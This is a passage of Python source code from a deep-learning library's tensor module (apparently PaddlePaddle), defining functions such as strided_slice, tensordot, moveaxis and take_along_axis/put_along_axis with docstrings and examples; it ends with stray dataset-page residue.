= [x[0, 2, :]]
= [8, 9, 10, 11]
* Case 3:
index = [[1, 2, 3]]
gather_nd(x, index)
= [x[1, 2, 3]]
= [23]
Args:
x (Tensor): The input Tensor which it's data type should be bool, float32, float64, int32, int64.
index (Tensor): The index input with rank > 1, index.shape[-1] <= input.rank.
Its dtype should be int32, int64.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
output (Tensor): A tensor with the shape index.shape[:-1] + input.shape[index.shape[-1]:]
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[[1, 2], [3, 4], [5, 6]],
[[7, 8], [9, 10], [11, 12]]])
index = paddle.to_tensor([[0, 1]])
output = paddle.gather_nd(x, index) #[[3, 4]]
"""
return paddle.fluid.layers.gather_nd(input=x, index=index, name=name)
def strided_slice(x, axes, starts, ends, strides, name=None):
"""
This operator produces a slice of ``x`` along multiple axes. Similar to numpy:
https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html
Slice uses ``axes``, ``starts`` and ``ends`` attributes to specify the start and
end dimension for each axis in the list of axes and Slice uses this information
to slice the input data tensor. If a negative value is passed to
``starts`` or ``ends`` such as :math:`-i`, it represents the reverse position of the
axis :math:`i-1` th(here 0 is the initial position). The ``strides`` represents steps of
slicing and if the ``strides`` is negative, slice operation is in the opposite direction.
If the value passed to ``starts`` or ``ends`` is greater than n
(the number of elements in this dimension), it represents n.
For slicing to the end of a dimension with unknown size, it is recommended
to pass in INT_MAX. The size of ``axes`` must be equal to ``starts`` , ``ends`` and ``strides``.
Following examples will explain how strided_slice works:
.. code-block:: text
Case1:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [1, 0]
ends = [2, 3]
strides = [1, 1]
Then:
result = [ [5, 6, 7], ]
Case2:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [2, 0]
strides = [1, -1]
Then:
result = [ [8, 7, 6], ]
Case3:
Given:
data = [ [1, 2, 3, 4], [5, 6, 7, 8], ]
axes = [0, 1]
starts = [0, 1]
ends = [-1, 1000]
strides = [1, 3]
Then:
result = [ [2], ]
Args:
x (Tensor): An N-D ``Tensor``. The data type is ``float32``, ``float64``, ``int32`` or ``int64``.
axes (list|tuple): The data type is ``int32`` . Axes that `starts` and `ends` apply to.
It's optional. If it is not provides, it will be treated as :math:`[0,1,...,len(starts)-1]`.
starts (list|tuple|Tensor): The data type is ``int32`` . If ``starts`` is a list or tuple, the elements of it should be integers or Tensors with shape [1]. If ``starts`` is an Tensor, it should be an 1-D Tensor. It represents starting indices of corresponding axis in ``axes``.
ends (list|tuple|Tensor): The data type is ``int32`` . If ``ends`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``ends`` is an Tensor, it should be an 1-D Tensor . It represents ending indices of corresponding axis in ``axes``.
strides (list|tuple|Tensor): The data type is ``int32`` . If ``strides`` is a list or tuple, the elements of
it should be integers or Tensors with shape [1]. If ``strides`` is an Tensor, it should be an 1-D Tensor . It represents slice step of corresponding axis in ``axes``.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Returns:
Tensor: A ``Tensor`` with the same dimension as ``x``. The data type is same as ``x``.
Examples:
.. code-block:: python
import paddle
x = paddle.zeros(shape=[3,4,5,6], dtype="float32")
# example 1:
# attr starts is a list which doesn't contain Tensor.
axes = [1, 2, 3]
starts = [-3, 0, 2]
ends = [3, 2, 4]
strides_1 = [1, 1, 1]
strides_2 = [1, 1, 2]
sliced_1 = paddle.strided_slice(x, axes=axes, starts=starts, ends=ends, strides=strides_1)
# sliced_1 is x[:, 1:3:1, 0:2:1, 2:4:1].
# example 2:
# attr starts is a list which contain tensor Tensor.
minus_3 = paddle.full(shape=[1], fill_value=-3, dtype='int32')
sliced_2 = paddle.strided_slice(x, axes=axes, starts=[minus_3, 0, 2], ends=ends, strides=strides_2)
# sliced_2 is x[:, 1:3:1, 0:2:1, 2:4:2].
"""
return paddle.fluid.layers.strided_slice(
input=x, axes=axes, starts=starts, ends=ends, strides=strides)
def tensordot(x, y, axes=2, name=None):
r"""
This function computes a contraction, which sum the product of elements from two tensors along the given axes.
Args:
x (Tensor): The left tensor for contraction with data type ``float32`` or ``float64``.
y (Tensor): The right tensor for contraction with the same data type as ``x``.
axes (int|tuple|list|Tensor, optional): The axes to contract for ``x`` and ``y``, defaulted to integer ``2``.
1. It could be a non-negative integer ``n``,
in which the function will sum over the last ``n`` axes of ``x`` and the first ``n`` axes of ``y`` in order.
2. It could be a 1-d tuple or list with data type ``int``, in which ``x`` and ``y`` will be contracted along the same given axes.
For example, ``axes`` =[0, 1] applies contraction along the first two axes for ``x`` and the first two axes for ``y``.
3. It could be a tuple or list containing one or two 1-d tuple|list|Tensor with data type ``int``.
When containing one tuple|list|Tensor, the data in tuple|list|Tensor specified the same axes for ``x`` and ``y`` to contract.
When containing two tuple|list|Tensor, the first will be applied to ``x`` and the second to ``y``.
When containing more than two tuple|list|Tensor, only the first two axis sequences will be used while the others will be ignored.
4. It could be a tensor, in which the ``axes`` tensor will be translated to a python list
and applied the same rules described above to determine the contraction axes.
Note that the ``axes`` with Tensor type is ONLY available in Dygraph mode.
name(str, optional): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name` .
Return:
Output (Tensor): The contraction result with the same data type as ``x`` and ``y``.
In general, :math:`output.ndim = x.ndim + y.ndim - 2 \times n_{axes}`, where :math:`n_{axes}` denotes the number of axes to be contracted.
NOTES:
1. This function supports tensor broadcast,
the size in the corresponding dimensions of ``x`` and ``y`` should be equal, or applies to the broadcast rules.
2. This function also supports axes expansion,
when the two given axis sequences for ``x`` and ``y`` are of different lengths,
the shorter sequence will expand the same axes as the longer one at the end.
For example, if ``axes`` =[[0, 1, 2, 3], [1, 0]],
the axis sequence for ``x`` is [0, 1, 2, 3],
while the corresponding axis sequences for ``y`` will be expanded from [1, 0] to [1, 0, 2, 3].
Examples:
.. code-block:: python
import paddle
data_type = 'float64'
# For two 2-d tensor x and y, the case axes=0 is equivalent to outer product.
# Note that tensordot supports empty axis sequence, so all the axes=0, axes=[], axes=[[]], and axes=[[],[]] are equivalent cases.
x = paddle.arange(4, dtype=data_type).reshape([2, 2])
y = paddle.arange(4, dtype=data_type).reshape([2, 2])
z = paddle.tensordot(x, y, axes=0)
# z = [[[[0., 0.],
# [0., 0.]],
#
# [[0., 1.],
# [2., 3.]]],
#
#
# [[[0., 2.],
# [4., 6.]],
#
# [[0., 3.],
# [6., 9.]]]]
# For two 1-d tensor x and y, the case axes=1 is equivalent to inner product.
x = paddle.arange(10, dtype=data_type)
y = paddle.arange(10, dtype=data_type)
z1 = paddle.tensordot(x, y, axes=1)
z2 = paddle.dot(x, y)
# z1 = z2 = [285.]
# For two 2-d tensor x and y, the case axes=1 is equivalent to matrix multiplication.
x = paddle.arange(6, dtype=data_type).reshape([2, 3])
y = paddle.arange(12, dtype=data_type).reshape([3, 4])
z1 = paddle.tensordot(x, y, axes=1)
z2 = paddle.matmul(x, y)
# z1 = z2 = [[20., 23., 26., 29.],
# [56., 68., 80., 92.]]
# When axes is a 1-d int list, x and y will be contracted along the same given axes.
# Note that axes=[1, 2] is equivalent to axes=[[1, 2]], axes=[[1, 2], []], axes=[[1, 2], [1]], and axes=[[1, 2], [1, 2]].
x = paddle.arange(24, dtype=data_type).reshape([2, 3, 4])
y = paddle.arange(36, dtype=data_type).reshape([3, 3, 4])
z = paddle.tensordot(x, y, axes=[1, 2])
# z = [[506. , 1298., 2090.],
# [1298., 3818., 6338.]]
# When axes is a list containing two 1-d int list, the first will be applied to x and the second to y.
x = paddle.arange(60, dtype=data_type).reshape([3, 4, 5])
y = paddle.arange(24, dtype=data_type).reshape([4, 3, 2])
z = paddle.tensordot(x, y, axes=([1, 0], [0, 1]))
# z = [[4400., 4730.],
# [4532., 4874.],
# [4664., 5018.],
# [4796., 5162.],
# [4928., 5306.]]
# Thanks to the support of axes expansion, axes=[[0, 1, 3, 4], [1, 0, 3, 4]] can be abbreviated as axes= [[0, 1, 3, 4], [1, 0]].
x = paddle.arange(720, dtype=data_type).reshape([2, 3, 4, 5, 6])
y = paddle.arange(720, dtype=data_type).reshape([3, 2, 4, 5, 6])
z = paddle.tensordot(x, y, axes=[[0, 1, 3, 4], [1, 0]])
# z = [[23217330., 24915630., 26613930., 28312230.],
# [24915630., 26775930., 28636230., 30496530.],
# [26613930., 28636230., 30658530., 32680830.],
# [28312230., 30496530., 32680830., 34865130.]]
"""
op_type = 'tensordot'
input_dtype = ['float32', 'float64']
check_variable_and_dtype(x, 'x', input_dtype, op_type)
check_variable_and_dtype(y, 'y', input_dtype, op_type)
check_type(axes, 'axes', (int, tuple, list, Variable), op_type)
def _var_to_list(var):
if in_dygraph_mode():
return tolist(var)
raise TypeError(
"The 'axes' with type 'Tensor' in " + op_type +
" is not available in static graph mode, "
"please convert its type to int|Tuple|List, or use dynamic graph mode."
)
axes_x = []
axes_y = []
if np.issubdtype(type(axes), np.integer):
assert axes >= 0, (
"The 'axes' in " + op_type +
f" should not be negative, but received axes={axes}.")
axes_x = range(x.ndim - axes, x.ndim)
axes_y = range(axes)
else:
if isinstance(axes, Variable):
axes = _var_to_list(axes)
if not axes or np.issubdtype(type(axes[0]), np.integer):
axes_x = axes
else:
axes_x = axes[0]
if len(axes) > 1:
axes_y = axes[1]
if isinstance(axes_x, Variable):
axes_x = _var_to_list(axes_x)
if isinstance(axes_y, Variable):
axes_y = _var_to_list(axes_y)
axes_x, axes_y = list(axes_x), list(axes_y)
len_axes_x, len_axes_y = len(axes_x), len(axes_y)
if len_axes_x < len_axes_y:
axes_x.extend(axes_y[len_axes_x:])
elif len_axes_y < len_axes_x:
axes_y.extend(axes_x[len_axes_y:])
shape_x, shape_y = list(x.shape), list(y.shape)
need_contracted_dim_x = np.zeros((x.ndim), dtype=bool)
need_contracted_dim_y = np.zeros((y.ndim), dtype=bool)
contraction_size = 1
for i in range(len(axes_x)):
dim_x, dim_y = axes_x[i], axes_y[i]
sx, sy = shape_x[dim_x], shape_y[dim_y]
if sx == 1:
shape_y[dim_y] = 1
y = y.sum(dim_y).reshape(shape_y)
elif sy == 1:
shape_x[dim_x] = 1
x = x.sum(dim_x).reshape(shape_x)
else:
assert sx == sy, "The dimensional size for 'x' and 'y' in " + op_type + f" should match each other, but 'x' has size {sx} in dim {dim_x} while 'y' has size {sy} in dim {dim_y}."
need_contracted_dim_x[dim_x] = True
need_contracted_dim_y[dim_y] = True
contraction_size *= shape_x[dim_x]
perm_x = []
perm_y = []
shape_out = []
not_contraction_size_x = 1
not_contraction_size_y = 1
for i in range(x.ndim):
if not need_contracted_dim_x[i]:
perm_x.append(i)
shape_out.append(shape_x[i])
not_contraction_size_x *= shape_x[i]
perm_x.extend(axes_x)
perm_y.extend(axes_y)
for i in range(y.ndim):
if not need_contracted_dim_y[i]:
perm_y.append(i)
shape_out.append(shape_y[i])
not_contraction_size_y *= shape_y[i]
if not shape_out:
shape_out = [1]
x = x.transpose(perm=perm_x).reshape(
[not_contraction_size_x, contraction_size])
y = y.transpose(perm=perm_y).reshape(
[contraction_size, not_contraction_size_y])
out = x.matmul(y).reshape(shape_out)
return out
def as_complex(x, name=None):
"""Transform a real tensor to a complex tensor.
The data type of the input tensor is 'float32' or 'float64', and the data
type of the returned tensor is 'complex64' or 'complex128', respectively.
The shape of the input tensor is ``(* ,2)``, (``*`` means arbitary shape), i.e.
the size of the last axis shoule be 2, which represent the real and imag part
of a complex number. The shape of the returned tensor is ``(*,)``.
Args:
x (Tensor): The input tensor. Data type is 'float32' or 'float64'.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: The output. Data type is 'complex64' or 'complex128', with the same precision as the input.
Examples:
.. code-block:: python
import paddle
x = paddle.arange(12, dtype=paddle.float32).reshape([2, 3, 2])
y = paddle.as_complex(x)
print(y.numpy())
# [[ 0. +1.j 2. +3.j 4. +5.j]
# [ 6. +7.j 8. +9.j 10.+11.j]]
"""
if in_dygraph_mode():
return paddle._C_ops.as_complex(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'as_complex')
op_type = "as_complex"
helper = LayerHelper(op_type, **locals())
inputs = {"X": x}
out = helper.create_variable_for_type_inference(
dtype=_real_to_complex_dtype(x.dtype))
outputs = {"Out": out}
attrs = {}
helper.append_op(type=op_type, inputs=inputs, attrs=attrs, outputs=outputs)
return out
def as_real(x, name=None):
"""Transform a complex tensor to a real tensor.
The data type of the input tensor is 'complex64' or 'complex128', and the data
type of the returned tensor is 'float32' or 'float64', respectively.
When the shape of the input tensor is ``(*, )``, (``*`` means arbitary shape),
the shape of the output tensor is ``(*, 2)``, i.e. the shape of the output is
the shape of the input appended by an extra ``2``.
Args:
x (Tensor): The input tensor. Data type is 'complex64' or 'complex128'.
name (str, optional): Name for the operation (optional, default is None). For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: The output. Data type is 'float32' or 'float64', with the same precision as the input.
Examples:
.. code-block:: python
import paddle
x = paddle.arange(12, dtype=paddle.float32).reshape([2, 3, 2])
y = paddle.as_complex(x)
z = paddle.as_real(y)
print(z.numpy())
# [[[ 0. 1.]
# [ 2. 3.]
# [ 4. 5.]]
# [[ 6. 7.]
# [ 8. 9.]
# [10. 11.]]]
"""
if in_dygraph_mode():
return paddle._C_ops.as_real(x)
check_variable_and_dtype(x, 'x', ['complex64', 'complex128'], 'as_real')
op_type = "as_real"
helper = LayerHelper(op_type, **locals())
inputs = {"X": x}
out = helper.create_variable_for_type_inference(
dtype=_complex_to_real_dtype(x.dtype))
outputs = {"Out": out}
helper.append_op(type=op_type, inputs=inputs, outputs=outputs)
return out
def repeat_interleave(x, repeats, axis=None, name=None):
"""
Returns a new tensor which repeats the ``x`` tensor along dimension ``axis`` using
the entries in ``repeats`` which is a int or a Tensor.
Args:
x (Tensor): The input Tensor to be operated. The data of ``x`` can be one of float32, float64, int32, int64.
repeats (Tensor or int): The number of repetitions for each element. repeats is broadcasted to fit the shape of the given axis.
axis (int, optional): The dimension in which we manipulate. Default: None, the output tensor is flatten.
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Tensor: A Tensor with same data type as ``x``.
Examples:
.. code-block:: python
import paddle
x = paddle.to_tensor([[1, 2, 3], [4, 5, 6]])
repeats = paddle.to_tensor([3, 2, 1], dtype='int32')
paddle.repeat_interleave(x, repeats, 1)
# [[1, 1, 1, 2, 2, 3],
# [4, 4, 4, 5, 5, 6]]
paddle.repeat_interleave(x, 2, 0)
# [[1, 2, 3], [1, 2, 3], [4, 5, 6], [4, 5, 6]]
paddle.repeat_interleave(x, 2, None)
# [1, 1, 2, 2, 3, 3, 4, 4, 5, 5, 6, 6]
"""
if axis is None:
x = paddle.flatten(x)
axis = 0
if in_dygraph_mode():
if isinstance(repeats, int):
return _C_ops.repeat_interleave(x, None, 'Repeats', repeats, 'dim',
axis)
elif isinstance(repeats, Variable):
return _C_ops.repeat_interleave(x, repeats, 'dim', axis)
helper = LayerHelper("repeat_interleave", **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'paddle.tensor.manipulation.repeat_interleave')
out = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='repeat_interleave',
inputs={
'X': x,
'RepeatsTensor': repeats if isinstance(repeats, Variable) else None
},
outputs={'Out': out},
attrs={
'dim': axis,
'Repeats': repeats if isinstance(repeats, int) else 0
})
return out
def moveaxis(x, source, destination, name=None):
"""
Move the axis of tensor from ``source`` position to ``destination`` position.
Other axis that have not been moved remain their original order.
Args:
x (Tensor): The input Tensor. It is a N-D Tensor of data types bool, int32, int64, float32, float64, complex64, complex128.
source(int|tuple|list): ``source`` position of axis that will be moved. Each element must be unique and integer.
destination(int|tuple|list(int)): ``destination`` position of axis that has been moved. Each element must be unique and integer.
name(str, optional): The default value is None. Normally there is no need for user to set this
property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
Tensor: A new tensor whose axis have been moved.
Examples:
.. code-block:: python
import paddle
x = paddle.ones([3, 2, 4])
paddle.moveaxis(x, [0, 1], [1, 2]).shape
# [4, 3, 2]
x = paddle.ones([2, 3])
paddle.moveaxis(x, 0, 1) # equivalent to paddle.t(x)
# [3, 2]
"""
src = [source] if isinstance(source, int) else source
dst = [destination] if isinstance(destination, int) else destination
assert len(src) == len(
dst), "'source' must have the same number with 'destination'"
count = Counter(src).most_common(1)
if count[0][1] > 1:
raise ValueError("Each elemment of 'source' must be unique!")
count = Counter(dst).most_common(1)
if count[0][1] > 1:
raise ValueError("Each elemment of 'destination' must be unique!")
ndim = len(x.shape)
# perm is the new order after move axis
perm = list(range(ndim))
src_dims = list(range(ndim))
dst_dims = list(range(ndim))
for i, axis in enumerate(zip(src, dst)):
assert isinstance(axis[0],
int), "Each elemment of 'source' must be integer."
if axis[0] < 0:
assert axis[
0] >= -ndim, "'source' must be in the range of [-{0}, {0})".format(
ndim)
src[i] += ndim
else:
assert axis[
0] < ndim, "'source' must be in the range of [-{0}, {0})".format(
ndim)
assert isinstance(axis[1],
int), "Each elemment of 'source' must be integer."
if axis[1] < 0:
assert axis[
1] >= -ndim, "'source' must be in the range of [-{0}, {0})".format(
ndim)
dst[i] += ndim
else:
assert axis[
1] < ndim, "'source' must be in the range of [-{0}, {0})".format(
ndim)
perm[dst[i]] = src[i]
src_dims.remove(src[i])
dst_dims.remove(dst[i])
for i in range(len(src_dims)):
perm[dst_dims[i]] = src_dims[i]
if in_dygraph_mode():
out, _ = _C_ops.transpose2(x, 'axis', perm)
return out
check_variable_and_dtype(
x, 'x', ['bool', 'float16', 'float32', 'float64', 'int32', 'int64'],
'moveaxis')
helper = LayerHelper('moveaxis', **locals())
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='transpose2',
inputs={'X': [x]},
outputs={'Out': [out],
'XShape': [x_shape]},
attrs={'axis': perm})
return out
def non_negative_axis(arr, axis):
ndim = len(arr.shape)
if axis >= 0:
assert axis < ndim, "'axis' must be in the range of [-{0}, {0})".format(
ndim)
else:
assert axis >= -ndim, "'axis' must be in the range of [-{0}, {0})".format(
ndim)
axis += ndim
return axis
def infer_broadcast_shape(arr, indices, axis):
# This function is used in take/put_along_axis
broadcast_shape_list = list(arr.shape)
broadcast_shape_list[axis] = list(indices.shape)[axis]
broadcast_shape = tuple(broadcast_shape_list)
for i in range(len(arr.shape)):
if arr.shape[i] < indices.shape[i]:
# if indices matrix has larger size than arr matrix, do not broadcast.
return None
return broadcast_shape
def take_along_axis(arr, indices, axis):
"""
Take values from the input array by given indices matrix along the designated axis.
Args:
arr (Tensor) : The input Tensor. Supported data types are float32 and float64.
indices (Tensor) : Indices to take along each 1d slice of arr. This must match the dimension of arr,
and need to broadcast against arr. Supported data type are int and int64.
axis (int) : The axis to take 1d slices along.
Returns:
Tensor: The indexed element, same dtype with arr
Examples:
.. code-block:: python
import paddle
import numpy as np
x_np = np.array([[1, 2, 3], [4, 5, 6], [7,8,9]])
index_np = np.array([[0]])
x = paddle.to_tensor(x_np)
index = paddle.to_tensor(index_np)
axis = 0
result = paddle.take_along_axis(x, index, axis)
print(result)
# [[1, 2, 3]]
"""
if (len(arr.shape) != len(indices.shape)):
raise ValueError(
"`indices` and `arr` must have the same number of dimensions!")
axis = non_negative_axis(arr, axis)
broadcast_shape = infer_broadcast_shape(arr, indices, axis)
if not broadcast_shape:
# if indices matrix have larger size than arr, arr should broadcast into indices shape.
broadcast_shape = indices.shape
if in_dygraph_mode():
indices = paddle.broadcast_to(indices, broadcast_shape)
broadcast_shape_list = list(broadcast_shape)
broadcast_shape_list[axis] = list(arr.shape)[axis]
broadcast_shape = tuple(broadcast_shape_list)
arr = paddle.broadcast_to(arr, broadcast_shape)
return _C_ops.take_along_axis(arr, indices, 'Axis', axis)
check_variable_and_dtype(
arr, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
'take_along_axis')
check_variable_and_dtype(indices, 'index', ['int32', 'int64'],
'take_along_axis')
indices = paddle.broadcast_to(indices, broadcast_shape)
broadcast_shape_list = list(broadcast_shape)
broadcast_shape_list[axis] = list(arr.shape)[axis]
broadcast_shape = tuple(broadcast_shape_list)
arr = paddle.broadcast_to(arr, broadcast_shape)
helper = LayerHelper('take_along_axis', **locals())
dtype = helper.input_dtype()
result = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="take_along_axis",
inputs={"Input": arr,
"Index": indices},
attrs={"Axis": axis},
outputs={"Result": result})
return result
def put_along_axis(arr, indices, values, axis, reduce='assign'):
"""
Put values into the destination array by given indices matrix along the designated axis.
Args:
arr (Tensor) : The Destination Tensor. Supported data types are float32 and float64.
indices (Tensor) : Indices to put along each 1d slice of arr. This must match the dimension of arr,
and need to broadcast against arr. Supported data type are int and int64.
axis (int) : The axis to put 1d slices along.
reduce (string | optinal) : The reduce operation, default is 'assign', support 'add', 'assign', 'mul' and 'multiply'.
Returns :
Tensor: The indexed element, same dtype with arr
Examples:
.. code-block:: python
import paddle
import numpy as np
x_np = np.array([[10, 30, 20], [60, 40, 50]])
index_np = np.array([[0]])
x = paddle.to_tensor(x_np)
index = paddle.to_tensor(index_np)
value = 99
axis = 0
result = paddle.put_along_axis(x, index, value, axis)
print(result)
# [[99, 99, 99],
# [60, 40, 50]]
"""
if (len(arr.shape) != len(indices.shape)):
raise ValueError(
"`indices` and `arr` must have the same number of dimensions!")
axis = non_negative_axis(arr, axis)
broadcast_shape = infer_broadcast_shape(arr, indices, axis)
if in_dygraph_mode():
values = paddle.to_tensor(values) if not isinstance(
values, paddle.Tensor) else values
if broadcast_shape:
indices = paddle.broadcast_to(indices, broadcast_shape)
values = paddle.broadcast_to(values, indices.shape)
return _C_ops.put_along_axis(arr, indices, values, "Axis", axis,
"Reduce", reduce)
check_variable_and_dtype(
arr, 'x', ['float16', 'float32', 'float64', 'int32', 'int64', 'uint8'],
'put_along_axis')
check_variable_and_dtype(indices, 'index', ['int32', 'int64'],
'put_along_axis')
if broadcast_shape:
indices = paddle.broadcast_to(indices, broadcast_shape)
values = paddle.broadcast_to(values, indices.shape)
helper = LayerHelper('put_along_axis', **locals())
dtype = helper.input_dtype()
result = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="put_along_axis",
inputs={"Input": arr,
"Index": indices,
"Value": values},
attrs={"Axis": axis,
"Reduce": reduce},
outputs={"Result": result})
return result
@inplace_apis_in_dygraph_only
def put_along_axis_(arr, indices, values, axis, reduce='assign'):
r"""
Inplace version of ``put_along_axis`` API, the output Tensor will be inplaced with input ``arr``.
Please refer to :ref:`api_tensor_put_along_axis`.
"""
if (len(arr.shape) != len(indices.shape)):
raise ValueError(
"`indices` and `arr` must have the same number of dimensions!")
axis = non_negative_axis(arr, axis)
broadcast_shape = infer_broadcast_shape(arr, indices, axis)
values = paddle.to_tensor(values) if not isinstance(
values, paddle.Tensor) else values
if broadcast_shape:
indices = paddle.broadcast_to(indices, broadcast_shape)
values = paddle.broadcast_to(values, indices.shape)
return _C_ops.put_along_axis_(arr, indices, values, "Axis", axis, "Reduce",
reduce)
| 38.010584 | 457 | 0.565825 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.